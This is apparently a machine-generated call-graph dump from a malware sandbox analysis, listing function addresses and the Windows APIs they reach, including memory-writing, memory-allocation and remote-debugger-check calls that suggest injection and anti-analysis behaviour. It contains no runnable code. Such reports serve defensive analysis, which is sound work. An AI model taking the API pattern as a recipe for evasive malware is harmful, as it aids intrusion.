NtWriteVirtualMemory GetModuleHandleA GetProcAddress FlushInstructionCache 28453->28457 28456 2db89d0 4 API calls 28454->28456 28460 2dc2e1e 28455->28460 28458 2dc1a7c 28456->28458 28457->28369 28459 2dc1a9d 28458->28459 28461 2dc1ab5 28459->28461 28462 2dc2e55 28460->28462 28464 2dc1ad4 28461->28464 28463 2db89d0 4 API calls 28462->28463 28466 2dc2e61 28463->28466 28465 2dc1aec 28464->28465 28468 2db89d0 4 API calls 28465->28468 28467 2dc2e8d 28466->28467 28471 2dc2e9a 28467->28471 28469 2dc1af8 28468->28469 28470 2dc1b19 28469->28470 28473 2dc1b31 28470->28473 28472 2dc2ec4 28471->28472 28474 2db89d0 4 API calls 28472->28474 28476 2dc1b50 28473->28476 28475 2dc2edd 28474->28475 28478 2dc2ee7 28475->28478 28477 2db89d0 4 API calls 28476->28477 28479 2dc1b74 28477->28479 28482 2dc2f09 28478->28482 28480 2dc1b95 28479->28480 28481 2dc1bad 28480->28481 28483 2dc1bcc 28481->28483 28484 2dc2f6c 28482->28484 28485 2dc1be4 28483->28485 28486 2db89d0 4 API calls 28484->28486 28487 2db89d0 4 API calls 28485->28487 28489 2dc2f85 28486->28489 28488 2dc1bf0 28487->28488 28491 2dc1c1c 28488->28491 28490 2dc2fb1 28489->28490 28492 2dc2fbe 28490->28492 28493 2dc1c48 28491->28493 28494 2dc2fdd 28492->28494 28495 2dc1c53 28493->28495 28496 2dc2fe8 28494->28496 28497 2dc1c60 28495->28497 28498 2dc2ff5 28496->28498 28500 2db89d0 4 API calls 28497->28500 28499 2db89d0 4 API calls 28498->28499 28505 2dc3001 28499->28505 28501 2dc1c6c 28500->28501 28502 2dc1c97 28501->28502 28503 2dc1cc3 28502->28503 28504 2dc1cd0 28503->28504 28506 2dc1cef 28504->28506 28507 2dc305a 28505->28507 28508 2dc1cfa 28506->28508 28509 2dc3091 28507->28509 28511 2db89d0 4 API calls 28508->28511 28510 2db89d0 4 API calls 28509->28510 28513 2dc309d 28510->28513 28512 2dc1d13 28511->28512 28514 2dc1d4c 28512->28514 28515 2dc30d6 28513->28515 28516 2dc1d76 28514->28516 28517 2dc310d 28515->28517 28519 2db89d0 4 API calls 28516->28519 28518 2db89d0 4 API calls 28517->28518 28522 2dc3119 28518->28522 28520 2dc1d8f 28519->28520 28521 2dc1db0 28520->28521 28524 2dc1dc8 28521->28524 28523 2dc3152 28522->28523 28525 2dc3171 28523->28525 28527 2dc1df2 28524->28527 28526 2dc317c 28525->28526 28528 2dc3189 28526->28528 28529 2db89d0 4 API calls 28527->28529 28530 2db89d0 4 API calls 28528->28530 28531 2dc1e0b 28529->28531 28532 2dc3195 28530->28532 28536 2dc1e36 28531->28536 28533 2dc31a6 28532->28533 28534 2dc31bc 28533->28534 28535 2dc31cf 28534->28535 28537 2dc31f0 28535->28537 28539 2dc1e6d 28536->28539 28538 2dc31fb 28537->28538 28540 2dc3208 28538->28540 28541 2dc1e85 28539->28541 28543 2dc3227 28540->28543 28542 2db89d0 4 API calls 28541->28542 28546 2dc1e91 28542->28546 28544 2dc3232 28543->28544 28545 2dc323f 28544->28545 28547 2db89d0 4 API calls 28545->28547 28549 2dc1eca 28546->28549 28548 2dc324b 28547->28548 28554 2dc326c 28548->28554 28550 2dc1ee9 28549->28550 28551 2dc1ef4 28550->28551 28552 2dc1f01 28551->28552 28553 2db89d0 4 API calls 28552->28553 28556 2dc1f26 28552->28556 28553->28552 28555 2db89d0 4 API calls 28554->28555 28557 2dc32c7 28555->28557 28558 2dc1f52 28556->28558 28560 2dc32e8 28557->28560 28559 2dc1f7e 28558->28559 28561 2dc1f89 28559->28561 28563 2dc331f 28560->28563 28562 2db89d0 4 API calls 28561->28562 28565 2dc1fa2 28562->28565 28564 2db89d0 4 API calls 28563->28564 28566 2dc3343 28564->28566 28567 2dc1fce 28565->28567 28570 2dc337c 28566->28570 28568 2dc1ffa 28567->28568 28569 2dc2005 28568->28569 28571 2db89d0 4 API calls 28569->28571 28573 2dc33b3 28570->28573 28766 2dc201e 28571->28766 28574 2db89d0 4 API calls 28573->28574 28575 2dc33bf 28574->28575 28578 2dc33dd 28575->28578 28576 2dc2030 28577 2dc205c 28576->28577 28579 2dc2088 28577->28579 28582 2dc340a 28578->28582 28580 2dc2093 28579->28580 28581 2db89d0 4 API calls 28580->28581 28583 2dc20ac 28581->28583 28588 2dc3437 28582->28588 28584 2dc20d8 28583->28584 28585 2dc2104 28584->28585 28586 2dc210f 28585->28586 28587 2db89d0 4 API calls 28586->28587 28587->28766 28589 2dc34b8 28588->28589 28590 2db89d0 4 API calls 28589->28590 28593 2dc34d1 28590->28593 28591 2dc213f 28592 2dc216b 28591->28592 28597 2dc2197 28592->28597 28595 2dc3534 28593->28595 28594 2db89d0 4 API calls 28594->28597 28596 2db89d0 4 API calls 28595->28596 28599 2dc354d 28596->28599 28597->28594 28598 2dc21e7 28597->28598 28604 2dc2213 28598->28604 28600 2dc3577 28599->28600 28635 2dc36eb 28599->28635 28603 2dc35a3 28600->28603 28601 2db89d0 4 API calls 28601->28604 28602 2dc3739 28605 2dc3770 28602->28605 28606 2dc35da 28603->28606 28604->28601 28610 2dc225f 28604->28610 28607 2db89d0 4 API calls 28605->28607 28608 2db89d0 4 API calls 28606->28608 28609 2dc3789 28607->28609 28614 2dc35f3 28608->28614 28611 2dc37aa 28609->28611 28613 2dc22ae 28610->28613 28616 2dc37e1 28611->28616 28612 2db89d0 4 API calls 28612->28613 28613->28612 28615 2dc22e6 28613->28615 28618 2dc3656 28614->28618 28617 2dc22f3 28615->28617 28619 2db89d0 4 API calls 28616->28619 28621 2dc2312 28617->28621 28620 2db89d0 4 API calls 28618->28620 28622 2dc3805 28619->28622 28626 2dc366f 28620->28626 28623 2dc232a 28621->28623 28627 2dc3859 28622->28627 28624 2db89d0 4 API calls 28623->28624 28625 2dc2336 28624->28625 28628 2dc2356 28625->28628 28630 2dc36d2 28626->28630 28633 2dc3890 28627->28633 28629 2dc2377 28628->28629 28632 2dc2382 28629->28632 28631 2db89d0 4 API calls 28630->28631 28631->28635 28636 2dc23ae 28632->28636 28634 2db89d0 4 API calls 28633->28634 28637 2dc38b4 28634->28637 28635->28602 28638 2dc23b9 28636->28638 28641 2dc38ed 28637->28641 28639 2db89d0 4 API calls 28638->28639 28640 2dc23f3 28638->28640 28639->28638 28642 2dc23fe 28640->28642 28643 2dc3924 28641->28643 28645 2dc242a 28642->28645 28644 2db89d0 4 API calls 28643->28644 28646 2dc3930 28644->28646 28647 2dc2435 28645->28647 28649 2dc395c 28646->28649 28648 2db89d0 4 API calls 28647->28648 28650 2dc244e 28648->28650 28651 2dc3993 28649->28651 28654 2dc249a 28650->28654 28652 2db89d0 4 API calls 28651->28652 28653 2dc39ac 28652->28653 28657 2dc39cd 28653->28657 28655 2dc24c6 28654->28655 28656 2dc24d1 28655->28656 28659 2dc24de 28656->28659 28660 2dc3a04 28657->28660 28658 2db89d0 4 API calls 28658->28659 28659->28658 28662 2dc2516 28659->28662 28661 2db89d0 4 API calls 28660->28661 28669 2dc3a28 28661->28669 28663 2dc2542 28662->28663 28664 2dc254d 28663->28664 28666 2dc255a 28664->28666 28665 2dc3a3d 28665->28669 28667 2db89d0 4 API calls 28666->28667 28668 2dc2566 28667->28668 28672 2dc259b 28668->28672 28669->28665 28673 2dc3aae 28669->28673 28739 2dc3df3 28669->28739 28670 2dc555c 28671 2dc5593 28670->28671 28674 2db89d0 4 API calls 28671->28674 28678 2dc25d2 28672->28678 28676 2dc3ae7 28673->28676 28675 2dc55ac 28674->28675 28677 2dc55cd 28675->28677 28679 2dc3b1e 28676->28679 28684 2dc5604 28677->28684 28681 2dc25ea 28678->28681 28682 2db89d0 4 API calls 28679->28682 28680 2db89d0 4 API calls 28680->28681 28681->28680 28683 2dc2617 28681->28683 28686 2dc3b2a 28682->28686 28685 2dc2622 28683->28685 28687 2db89d0 4 API calls 28684->28687 28690 2dc264e 28685->28690 28689 2dc3b56 28686->28689 28688 2dc5628 28687->28688 28697 2dc5654 28688->28697 28691 2dc3b8d 28689->28691 28694 2dc2666 28690->28694 28693 2db89d0 4 API calls 28691->28693 28692 2db89d0 4 API calls 28692->28694 28695 2dc3ba6 28693->28695 28694->28692 28696 2dc2688 28694->28696 28699 2dc3bc7 28695->28699 28701 2dc269b 28696->28701 28698 2db89d0 4 API calls 28697->28698 28700 2dc56a4 28698->28700 28702 2dc3bfe 28699->28702 28708 2dc56d0 28700->28708 28704 2dc26f3 28701->28704 28703 2db89d0 4 API calls 28702->28703 28707 2dc3c22 28703->28707 29384 2da46d4 28704->29384 28713 2dc3c5b 28707->28713 28709 2db89d0 4 API calls 28708->28709 28710 2dc5720 28709->28710 28722 2dc5746 28710->28722 28716 2dc3c92 28713->28716 28717 2db89d0 4 API calls 28716->28717 28720 2dc3c9e 28717->28720 28723 2dc3cc7 28720->28723 28724 2db89d0 4 API calls 28722->28724 28728 2dc3d35 28723->28728 28733 2dc57c2 28724->28733 28730 2dc3d6c 28728->28730 28732 2db89d0 4 API calls 28730->28732 28734 2dc3d85 28732->28734 28735 2db89d0 4 API calls 28733->28735 28737 2dc3dcb 28734->28737 28741 2dc583e 28735->28741 28737->28739 28738 2dc2877 28738->28766 28739->28111 28739->28670 28740 2dc28b5 28743 2dc290d 28740->28743 28742 2db89d0 4 API calls 28741->28742 28748 2dc58e6 28742->28748 28744 2da46d4 28743->28744 28746 2dc2925 28744->28746 28745 2db89d0 4 API calls 28745->28746 28746->28745 28747 2dc296a 28746->28747 28749 2dc2989 28747->28749 28750 2db89d0 4 API calls 28748->28750 28751 2dc2994 28749->28751 28755 2dc5962 28750->28755 28752 2dc29a1 28751->28752 28753 2db89d0 4 API calls 28752->28753 28754 2dc29ad 28753->28754 28757 2dc29ee 28754->28757 28756 2db89d0 4 API calls 28755->28756 28762 2dc59de 28756->28762 28758 2dc2a06 28757->28758 28759 2dc2a25 28758->28759 28761 2dc2a30 28759->28761 28760 2db89d0 4 API calls 28760->28761 28761->28760 28764 2dc2a6a 28761->28764 28763 2db89d0 4 API calls 28762->28763 28768 2dc5a5a 28763->28768 28765 2dc286c 28764->28765 28765->28738 28766->28369 28766->28531 28766->28576 28766->28591 28766->28740 28767 2db89d0 NtWriteVirtualMemory GetModuleHandleA GetProcAddress FlushInstructionCache 28766->28767 29383 2dbe4b8 NtWriteVirtualMemory GetModuleHandleA GetProcAddress FlushInstructionCache 28766->29383 28767->28766 28769 2db89d0 4 API calls 28768->28769 28770 2dc5b07 28769->28770 28771 2db89d0 4 API calls 28770->28771 28772 2dc5b83 28771->28772 28773 2db89d0 4 API calls 28772->28773 28774 2dc5bff 28773->28774 28775 2db89d0 4 API calls 28774->28775 28776 2dc5c7b 28775->28776 28777 2db89d0 4 API calls 28776->28777 28778 2dc5cf7 28777->28778 28779 2db89d0 4 API calls 28778->28779 28780 2dc5d73 28779->28780 28781 2dc7568 28780->28781 28783 2dc5dd3 28780->28783 28782 2db89d0 4 API calls 28781->28782 28785 2dc75e4 28782->28785 28784 2db89d0 4 API calls 28783->28784 28787 2dc5e4f 28784->28787 28786 2db89d0 4 API calls 28785->28786 28789 2dc7660 28786->28789 28788 2db89d0 4 API calls 28787->28788 28791 2dc5ecb 28788->28791 28790 2db89d0 4 API calls 28789->28790 28793 2dc76dc 28790->28793 28792 2db89d0 4 API calls 28791->28792 28797 2dc5f47 28792->28797 28794 2db89d0 4 API calls 28793->28794 28795 2dc7758 28794->28795 28796 2db89d0 4 API calls 28795->28796 28798 2dc77d4 28796->28798 28799 2db89d0 4 API calls 28797->28799 28802 2dc77e9 28798->28802 28803 2dc8318 28798->28803 28800 2dc5ffb 28799->28800 28801 2db89d0 4 API calls 28800->28801 28806 2dc6077 28801->28806 28805 2db89d0 4 API calls 28802->28805 28804 2db89d0 4 API calls 28803->28804 28809 2dc8394 28804->28809 28808 2dc7865 28805->28808 28807 2db89d0 4 API calls 28806->28807 28812 2dc60f3 28807->28812 28810 2db89d0 4 API calls 28808->28810 28811 2db89d0 4 API calls 28809->28811 28815 2dc78e1 28810->28815 28814 2dc8410 28811->28814 28813 2db89d0 4 API calls 28812->28813 28823 2dc616f 28813->28823 28817 2db89d0 4 API calls 28814->28817 28816 2db89d0 4 API calls 28815->28816 28818 2dc795d 28816->28818 28820 2dc848c 28817->28820 29387 2db85bc GetModuleHandleA GetProcAddress 28818->29387 28821 2db89d0 4 API calls 28820->28821 28822 2dc8508 28821->28822 28825 2dc851d 28822->28825 28830 2dc93a1 28822->28830 28824 2db89d0 4 API calls 28823->28824 28831 2dc623c 28824->28831 28828 2dc853e 28825->28828 28826 2dc7986 28827 2db89d0 4 API calls 28826->28827 28835 2dc7a02 28827->28835 28829 2dc8575 28828->28829 28832 2db89d0 4 API calls 28829->28832 28833 2db89d0 4 API calls 28830->28833 28834 2db89d0 4 API calls 28831->28834 28837 2dc8599 28832->28837 28840 2dc941d 28833->28840 28841 2dc62b8 28834->28841 28836 2db89d0 4 API calls 28835->28836 28846 2dc7a7e 28836->28846 28838 2dc85d2 28837->28838 28839 2dc8609 28838->28839 28842 2db89d0 4 API calls 28839->28842 28843 2db89d0 4 API calls 28840->28843 28844 2db89d0 4 API calls 28841->28844 28845 2dc8615 28842->28845 28850 2dc9499 28843->28850 28851 2dc6334 28844->28851 28848 2dc8641 28845->28848 28847 2db89d0 4 API calls 28846->28847 28857 2dc7afa 28847->28857 28849 2dc8678 28848->28849 28852 2db89d0 4 API calls 28849->28852 28853 2db89d0 4 API calls 28850->28853 28854 2db89d0 4 API calls 28851->28854 28855 2dc8691 28852->28855 28868 2dc9515 28853->28868 28861 2dc63b0 28854->28861 28856 2dc86bd 28855->28856 28859 2dc86e0 28856->28859 28858 2db89d0 4 API calls 28857->28858 28870 2dc7b9d 28858->28870 28860 2dc876e 28859->28860 28863 2dc86f2 28859->28863 28865 2dc878f 28860->28865 28862 2db89d0 4 API calls 28861->28862 28876 2dc642c 28862->28876 28867 2dc871e 28863->28867 28864 2dc9cf5 28866 2db89d0 4 API calls 28864->28866 28873 2dc87a7 28865->28873 28879 2dc9d71 28866->28879 28871 2dc8755 28867->28871 28868->28864 28869 2db89d0 4 API calls 28868->28869 28882 2dc95bb 28869->28882 28872 2db89d0 4 API calls 28870->28872 28874 2db89d0 4 API calls 28871->28874 28885 2dc7c19 28872->28885 28875 2db89d0 4 API calls 28873->28875 28874->28860 28878 2dc87ea 28875->28878 28877 2db89d0 4 API calls 28876->28877 28881 2dc64a8 28877->28881 28887 2dc8823 28878->28887 28880 2db89d0 4 API calls 28879->28880 28890 2dc9ded 28880->28890 29386 2db85bc GetModuleHandleA GetProcAddress 28881->29386 28883 2db89d0 4 API calls 28882->28883 28892 2dc9637 28883->28892 28886 2db89d0 4 API calls 28885->28886 28897 2dc7c95 28886->28897 28888 2db89d0 4 API calls 28887->28888 28889 2dc8866 28888->28889 28901 2dc88b9 28889->28901 28891 2db89d0 4 API calls 28890->28891 28896 2dc9e69 28891->28896 28894 2db89d0 4 API calls 28892->28894 28893 2dc64e6 28895 2db89d0 4 API calls 28893->28895 28912 2dc96b3 28894->28912 28906 2dc6562 28895->28906 28898 2db89d0 4 API calls 28896->28898 28899 2db89d0 4 API calls 28897->28899 28900 2dc9e9c 28898->28900 28909 2dc7d30 28899->28909 28902 2db89d0 4 API calls 28900->28902 28903 2db89d0 4 API calls 28901->28903 28905 2dc9ecf 28902->28905 28904 2dc8914 28903->28904 28914 2dc8935 28904->28914 28908 2db89d0 4 API calls 28905->28908 28907 2db89d0 4 API calls 28906->28907 28917 2dc65de 28907->28917 28910 2dc9f02 28908->28910 28911 2db89d0 4 API calls 28909->28911 28913 2db89d0 4 API calls 28910->28913 28919 2dc7dac 28911->28919 28915 2db89d0 4 API calls 28912->28915 28921 2dc9f35 28913->28921 28916 2db89d0 4 API calls 28914->28916 28923 2dc978a 28915->28923 28925 2dc8990 28916->28925 28918 2db89d0 4 API calls 28917->28918 28929 2dc665a 28918->28929 28920 2db89d0 4 API calls 28919->28920 28935 2dc7e28 28920->28935 28922 2db89d0 4 API calls 28921->28922 28931 2dc9fb1 28922->28931 28924 2db89d0 4 API calls 28923->28924 28933 2dc9806 28924->28933 28926 2db89d0 4 API calls 28925->28926 28927 2dc8a0c 28926->28927 29390 2dbd164 NtAllocateVirtualMemory NtWriteVirtualMemory GetModuleHandleA GetProcAddress FlushInstructionCache 28927->29390 28930 2db89d0 4 API calls 28929->28930 28942 2dc66d6 28930->28942 28932 2db89d0 4 API calls 28931->28932 28946 2dca02d 28932->28946 28934 2db89d0 4 API calls 28933->28934 29004 2dc9aa9 28933->29004 28948 2dc9894 28934->28948 28938 2db89d0 4 API calls 28935->28938 28936 2db89d0 4 API calls 28949 2dc9b6b 28936->28949 28937 2dc8a20 28939 2db89d0 4 API calls 28937->28939 28941 2dc7ee5 28938->28941 28952 2dc8aa1 28939->28952 28940 2dc68db 28944 2db89d0 4 API calls 28940->28944 29388 2db7e50 GetModuleHandleA GetProcAddress 28941->29388 28942->28940 28943 2db89d0 4 API calls 28942->28943 28959 2dc6767 28943->28959 28956 2dc69c5 28944->28956 28947 2db89d0 4 API calls 28946->28947 28951 2dca0a9 28947->28951 28953 2db89d0 4 API calls 28948->28953 28950 2db89d0 4 API calls 28949->28950 28966 2dc9be7 28950->28966 28955 2db89d0 4 API calls 28951->28955 28954 2db89d0 4 API calls 28952->28954 28965 2dc9910 28953->28965 28967 2dc8b1d 28954->28967 28958 2dca0dc 28955->28958 28960 2db89d0 4 API calls 28956->28960 28957 2dc7f08 28961 2db89d0 4 API calls 28957->28961 28963 2db89d0 4 API calls 28958->28963 28962 2db89d0 4 API calls 28959->28962 28978 2dc6a41 28960->28978 28975 2dc7f84 28961->28975 28977 2dc67e3 28962->28977 28964 2dca10f 28963->28964 28970 2db89d0 4 API calls 28964->28970 28968 2db89d0 4 API calls 28965->28968 28969 2db89d0 4 API calls 28966->28969 28971 2db89d0 4 API calls 28967->28971 28989 2dc998c 28968->28989 28984 2dc9c63 28969->28984 28973 2dca142 28970->28973 28972 2dc8b99 28971->28972 28986 2dc8bb9 28972->28986 29391 2db8730 GetModuleHandleA GetProcAddress 28972->29391 28976 2db89d0 4 API calls 28973->28976 28980 2db89d0 4 API calls 28975->28980 28982 2dca175 28976->28982 28981 2db89d0 4 API calls 28977->28981 28979 2db89d0 4 API calls 28978->28979 28994 2dc6abd 28979->28994 28992 2dc8000 28980->28992 28993 2dc685f 28981->28993 28983 2db89d0 4 API calls 28982->28983 28998 2dca1a8 28983->28998 28985 2db89d0 4 API calls 28984->28985 28987 2dc9cdf 28985->28987 28988 2db89d0 4 API calls 28986->28988 29227 2db8d70 28987->29227 29000 2dc8c35 28988->29000 28991 2db89d0 4 API calls 28989->28991 29002 2dc9a2d 28991->29002 28995 2db89d0 4 API calls 28992->28995 28996 2db89d0 4 API calls 28993->28996 28997 2db89d0 4 API calls 28994->28997 29006 2dc807c 28995->29006 28996->28940 29005 2dc6b39 28997->29005 28999 2db89d0 4 API calls 28998->28999 29012 2dca224 28999->29012 29001 2db89d0 4 API calls 29000->29001 29014 2dc8cb1 29001->29014 29003 2db89d0 4 API calls 29002->29003 29003->29004 29004->28936 29008 2db89d0 4 API calls 29005->29008 29007 2db89d0 4 API calls 29006->29007 29009 2dc80f8 29007->29009 29018 2dc6bb5 29008->29018 29389 2dbb118 NtAllocateVirtualMemory NtWriteVirtualMemory GetModuleHandleA GetProcAddress FlushInstructionCache 29009->29389 29011 2dc8109 29011->28111 29013 2db89d0 4 API calls 29012->29013 29016 2dca2a0 29013->29016 29015 2db89d0 4 API calls 29014->29015 29020 2dc8d2d 29015->29020 29017 2db89d0 4 API calls 29016->29017 29021 2dca2d3 29017->29021 29019 2db89d0 4 API calls 29018->29019 29024 2dc6c31 29019->29024 29022 2db89d0 4 API calls 29020->29022 29023 2db89d0 4 API calls 29021->29023 29026 2dc8db4 29022->29026 29027 2dca34f 29023->29027 29025 2db89d0 4 API calls 29024->29025 29030 2dc6cad 29025->29030 29028 2db89d0 4 API calls 29026->29028 29029 2db89d0 4 API calls 29027->29029 29032 2dc8e30 29028->29032 29033 2dca3cb 29029->29033 29031 2db89d0 4 API calls 29030->29031 29042 2dc6d48 29031->29042 29034 2db89d0 4 API calls 29032->29034 29035 2db89d0 4 API calls 29033->29035 29040 2dc8eac 29034->29040 29036 2dca447 29035->29036 29037 2db89d0 4 API calls 29036->29037 29038 2dca47a 29037->29038 29039 2db89d0 4 API calls 29038->29039 29043 2dca4ad 29039->29043 29041 2db89d0 4 API calls 29040->29041 29048 2dc8f33 29041->29048 29045 2db89d0 4 API calls 29042->29045 29044 2db89d0 4 API calls 29043->29044 29046 2dca4e0 29044->29046 29050 2dc6e43 29045->29050 29047 2db89d0 4 API calls 29046->29047 29052 2dca513 29047->29052 29049 2db89d0 4 API calls 29048->29049 29054 2dc8faf 29049->29054 29051 2db89d0 4 API calls 29050->29051 29058 2dc6ebf 29051->29058 29053 2db89d0 4 API calls 29052->29053 29056 2dca58f 29053->29056 29055 2db89d0 4 API calls 29054->29055 29061 2dc902b 29055->29061 29057 2db89d0 4 API calls 29056->29057 29060 2dca60b 29057->29060 29059 2db89d0 4 API calls 29058->29059 29066 2dc6f77 29059->29066 29062 2db89d0 4 API calls 29060->29062 29063 2db89d0 4 API calls 29061->29063 29064 2dca63e 29062->29064 29070 2dc90a7 29063->29070 29065 2db89d0 4 API calls 29064->29065 29067 2dca671 29065->29067 29068 2db89d0 4 API calls 29066->29068 29069 2db89d0 4 API calls 29067->29069 29074 2dc6ff3 29068->29074 29072 2dca6a4 29069->29072 29071 2db89d0 4 API calls 29070->29071 29077 2dc9123 29071->29077 29073 2db89d0 4 API calls 29072->29073 29075 2dca6d7 29073->29075 29074->28111 29076 2db89d0 4 API calls 29075->29076 29079 2dca70a 29076->29079 29078 2db89d0 4 API calls 29077->29078 29081 2dc919f 29078->29081 29080 2db89d0 4 API calls 29079->29080 29089 2dca786 29080->29089 29082 2db89d0 4 API calls 29081->29082 29083 2dc921b 29082->29083 29392 2db894c 29083->29392 29085 2dc923a 29086 2db894c 3 API calls 29085->29086 29087 2dc924e 29086->29087 29088 2db894c 3 API calls 29087->29088 29090 2dc9262 29088->29090 29091 2db89d0 4 API calls 29089->29091 29092 2db894c 3 API calls 29090->29092 29097 2dca802 29091->29097 29093 2dc9276 29092->29093 29094 2db894c 3 API calls 29093->29094 29095 2dc928a 29094->29095 29096 2db894c 3 API calls 29095->29096 29099 2dc929e 29096->29099 29098 2db89d0 4 API calls 29097->29098 29101 2dca87e 29098->29101 29100 2db89d0 4 API calls 29099->29100 29103 2dc9325 29100->29103 29102 2db89d0 4 API calls 29101->29102 29105 2dca8fa 29102->29105 29104 2db89d0 4 API calls 29103->29104 29104->28830 29106 2db89d0 4 API calls 29105->29106 29107 2dca976 29106->29107 29108 2db89d0 4 API calls 29107->29108 29109 2dca985 29108->29109 29110 2db89d0 4 API calls 29109->29110 29111 2dca994 29110->29111 29112 2db89d0 4 API calls 29111->29112 29113 2dca9a3 29112->29113 29114 2db89d0 4 API calls 29113->29114 29115 2dca9b2 29114->29115 29116 2db89d0 4 API calls 29115->29116 29117 2dca9c1 29116->29117 29118 2db89d0 4 API calls 29117->29118 29119 2dca9d0 29118->29119 29120 2db89d0 4 API calls 29119->29120 29121 2dca9df 29120->29121 29122 2db89d0 4 API calls 29121->29122 29123 2dca9ee 29122->29123 29124 2db89d0 4 API calls 29123->29124 29125 2dca9fd 29124->29125 29126 2db89d0 4 API calls 29125->29126 29127 2dcaa0c 29126->29127 29128 2db89d0 4 API calls 29127->29128 29129 2dcaa1b 29128->29129 29130 2db89d0 4 API calls 29129->29130 29131 2dcaa2a 29130->29131 29132 2db89d0 4 API calls 29131->29132 29133 2dcaa39 29132->29133 29134 2db89d0 4 API calls 29133->29134 29135 2dcaa48 29134->29135 29136 2db89d0 4 API calls 29135->29136 29137 2dcaa57 29136->29137 29138 2db89d0 4 API calls 29137->29138 29139 2dcaad3 29138->29139 29140 2db89d0 4 API calls 29139->29140 29141 2dcab06 29140->29141 29142 2db89d0 4 API calls 29141->29142 29143 2dcab39 29142->29143 29144 2db89d0 4 API calls 29143->29144 29145 2dcab6c 29144->29145 29146 2db89d0 4 API calls 29145->29146 29147 2dcab9f 29146->29147 29148 2db89d0 4 API calls 29147->29148 29149 2dcabd2 29148->29149 29150 2db89d0 4 API calls 29149->29150 29151 2dcac05 29150->29151 29152 2db89d0 4 API calls 29151->29152 29153 2dcac38 29152->29153 29154 2db89d0 4 API calls 29153->29154 29155 2dcacb4 29154->29155 29156 2db89d0 4 API calls 29155->29156 29157 2dcad30 29156->29157 29158 2db89d0 4 API calls 29157->29158 29159 2dcadac 29158->29159 29160 2db89d0 4 API calls 29159->29160 29161 2dcaddf 29160->29161 29162 2db89d0 4 API calls 29161->29162 29163 2dcae12 29162->29163 29164 2db89d0 4 API calls 29163->29164 29165 2dcae45 29164->29165 29166 2db89d0 4 API calls 29165->29166 29167 2dcae78 29166->29167 29168 2db89d0 4 API calls 29167->29168 29169 2dcaeab 29168->29169 29170 2db89d0 4 API calls 29169->29170 29171 2dcaede 29170->29171 29172 2db89d0 4 API calls 29171->29172 29173 2dcaf11 29172->29173 29174 2db89d0 4 API calls 29173->29174 29175 2dcaf44 29174->29175 29176 2db89d0 4 API calls 29175->29176 29177 2dcaf77 29176->29177 29178 2db89d0 4 API calls 29177->29178 29179 2dcafaa 29178->29179 29180 2db89d0 4 API calls 29179->29180 29181 2dcafdd 29180->29181 29182 2db89d0 4 API calls 29181->29182 29183 2dcb010 29182->29183 29184 2db89d0 4 API calls 29183->29184 29185 2dcb043 29184->29185 29186 2db89d0 4 API calls 29185->29186 29187 2dcb076 29186->29187 29188 2db89d0 4 API calls 29187->29188 29189 2dcb0a9 29188->29189 29190 2db89d0 4 API calls 29189->29190 29191 2dcb0dc 29190->29191 29192 2db89d0 4 API calls 29191->29192 29193 2dcb10f 29192->29193 29194 2db89d0 4 API calls 29193->29194 29195 2dcb142 29194->29195 29196 2db89d0 4 API calls 29195->29196 29197 2dcb175 29196->29197 29396 2db8338 29197->29396 29199 2dcb184 29200 2db89d0 4 API calls 29199->29200 29201 2dcb200 29200->29201 29202 2db89d0 4 API calls 29201->29202 29203 2dcb27c 29202->29203 29204 2db89d0 4 API calls 29203->29204 29204->28143 29206 2db88c6 29205->29206 29403 2db8274 29206->29403 29208 2db88f1 29407 2db7d78 29208->29407 29210 2db891f 29210->28115 29212 2db89e4 29211->29212 29213 2db81cc 2 API calls 29212->29213 29214 2db8a1d 29213->29214 29215 2db8274 GetProcAddress 29214->29215 29216 2db8a36 29215->29216 29217 2db7d78 3 API calls 29216->29217 29218 2db8a95 29217->29218 29219 2db8338 3 API calls 29218->29219 29220 2db8aa4 29219->29220 29220->28120 29223 2dbf759 29221->29223 29222 2dbf786 29222->28146 29223->29222 29224 2dbf774 CheckRemoteDebuggerPresent 29223->29224 29224->29222 29226 2da4871 29225->29226 29228 2db8d78 29227->29228 29229 2db89d0 4 API calls 29228->29229 29230 2db8dfb 29229->29230 29231 2db89d0 4 API calls 29230->29231 29232 2db8e54 29231->29232 29233 2dba8b7 29232->29233 29234 2db89d0 4 API calls 29232->29234 29233->28864 29235 2db8ec5 29234->29235 29236 2db89d0 4 API calls 29235->29236 29237 2db8f1e 29236->29237 29237->29233 29238 2db89d0 4 API calls 29237->29238 29239 2db8fa6 29238->29239 29240 2db89d0 4 API calls 29239->29240 29241 2db8fff 29240->29241 29242 2db89d0 4 API calls 29241->29242 29243 2db9084 29242->29243 29244 2db89d0 4 API calls 29243->29244 29245 2db90e3 29244->29245 29246 2db89d0 4 API calls 29245->29246 29247 2db9154 29246->29247 29248 2db89d0 4 API calls 29247->29248 29249 2db91c5 29248->29249 29250 2db89d0 4 API calls 29249->29250 29251 2db9236 29250->29251 29419 2db8788 29251->29419 29253 2db9273 29254 2db92e8 29253->29254 29256 2db89d0 4 API calls 29253->29256 29255 2db89d0 4 API calls 29254->29255 29257 2db9359 29255->29257 29256->29254 29258 2db89d0 4 API calls 29257->29258 29259 2db938c 29258->29259 29260 2db89d0 4 API calls 29259->29260 29261 2db93fd 29260->29261 29262 2db89d0 4 API calls 29261->29262 29263 2db946e 29262->29263 29264 2db89d0 4 API calls 29263->29264 29265 2db950b 29264->29265 29266 2db89d0 4 API calls 29265->29266 29267 2db957c 29266->29267 29268 2db89d0 4 API calls 29267->29268 29269 2db95ed 29268->29269 29269->29233 29270 2db89d0 4 API calls 29269->29270 29271 2db9680 29270->29271 29272 2db89d0 4 API calls 29271->29272 29273 2db96f1 29272->29273 29274 2db89d0 4 API calls 29273->29274 29275 2db9762 29274->29275 29276 2db89d0 4 API calls 29275->29276 29277 2db97d3 29276->29277 29278 2db89d0 4 API calls 29277->29278 29279 2db9844 29278->29279 29426 2db8400 29279->29426 29281 2db9864 29282 2db9b7f 29281->29282 29283 2db9878 29281->29283 29284 2db89d0 4 API calls 29282->29284 29285 2db89d0 4 API calls 29283->29285 29286 2db9b78 29284->29286 29287 2db98e9 29285->29287 29288 2db89d0 4 API calls 29286->29288 29289 2db89d0 4 API calls 29287->29289 29290 2db9c61 29288->29290 29291 2db995a 29289->29291 29292 2db89d0 4 API calls 29290->29292 29293 2db89d0 4 API calls 29291->29293 29299 2db9cd2 29292->29299 29294 2db99cb 29293->29294 29433 2db8670 29294->29433 29296 2db99df 29297 2db99e3 29296->29297 29303 2db9a0b 29296->29303 29298 2db7a2c 3 API calls 29297->29298 29305 2db9a04 29298->29305 29300 2db89d0 4 API calls 29299->29300 29301 2db9d43 29300->29301 29302 2db7a2c 3 API calls 29301->29302 29307 